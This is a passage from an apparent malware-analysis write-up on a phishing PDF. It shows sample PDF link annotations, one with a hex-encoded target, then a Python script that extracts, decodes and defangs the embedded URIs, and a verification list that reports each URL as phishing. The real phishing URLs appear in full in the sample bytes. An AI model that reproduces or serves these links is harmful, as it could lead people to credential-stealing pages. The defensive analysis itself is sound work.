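1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://www.diamondcreationslb.com/doc/rdd.htm) >> >> endobj
5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://ruseuropharm.ru/tobi/index.php) >> >> endobj
6 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://www.diamondcreationslb.com/doc/rdd.htm) >> >> endobj
7 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI <687474703a2f2f7463696c2d62642e636f6d2f6466702f696e6465782e706870> >> >> endobj
%%EOF
"""

# /URI followed by a literal string (...) with backslash escapes, or a hex string <...>.
URI_VALUE = re.compile(rb"/URI\s*(?:\(((?:\\.|[^\\)])*)\)|<([0-9A-Fa-f\s]*)>)", re.DOTALL)
URI_KEYWORD = re.compile(rb"/URI(?![A-Za-z0-9])")


def _unescape_literal(raw):
    # PDF literal strings escape ( ) and \ with a backslash.
    return re.sub(rb"\\(.)", rb"\1", raw)


def count_uri_keyword(data):
    """What PDFiD reports: every occurrence of the /URI name, including the /S /URI
    action type, so it is higher than the number of real link targets."""
    return len(URI_KEYWORD.findall(data))


def extract_uris(data):
    """Counter of decoded URL -> number of annotations pointing at it."""
    found = Counter()
    for m in URI_VALUE.finditer(data):
        if m.group(2) is not None:
            value = bytes.fromhex(re.sub(rb"\s", b"", m.group(2)).decode("ascii"))
        else:
            value = _unescape_literal(m.group(1))
        found[value.decode("latin-1")] += 1
    return found


def defang(url):
    """Make a URL safe to paste into a report."""
    return url.replace("http://", "hxxp://").replace("https://", "hxxps://").replace(".", "[.]")


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    print("/URI keyword occurrences:", count_uri_keyword(data))
    for url, n in extract_uris(data).most_common():
        print(f"{n:3d}  {defang(url)}")
```

This works on the raw file bytes, so it only sees URIs in uncompressed dictionaries; for annotations inside compressed object streams, run pdf-parser with its stream-decoding options first, or feed the script the decompressed output.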

URL Verification

http://www.diamondcreationslb . com/doc/rdd.htm

Report: Phishing

http://ruseuropharm . ru/tobi/index.php

Report: Phishing

Status: 404

http://tcil-bd . com/tin-count/zigi/index.php

Report: Phishing

Status: 404

http://tcil-bd . com/wp-includes/IXR/alen/index.php

Report: Phishing

Status: 404

http://tcil-bd . com/dfp/index.php

Report: Phishing

Status: 404

Summary:

  • The PDF file has URLs embedded.
  • All of the URLs are reported as phishing.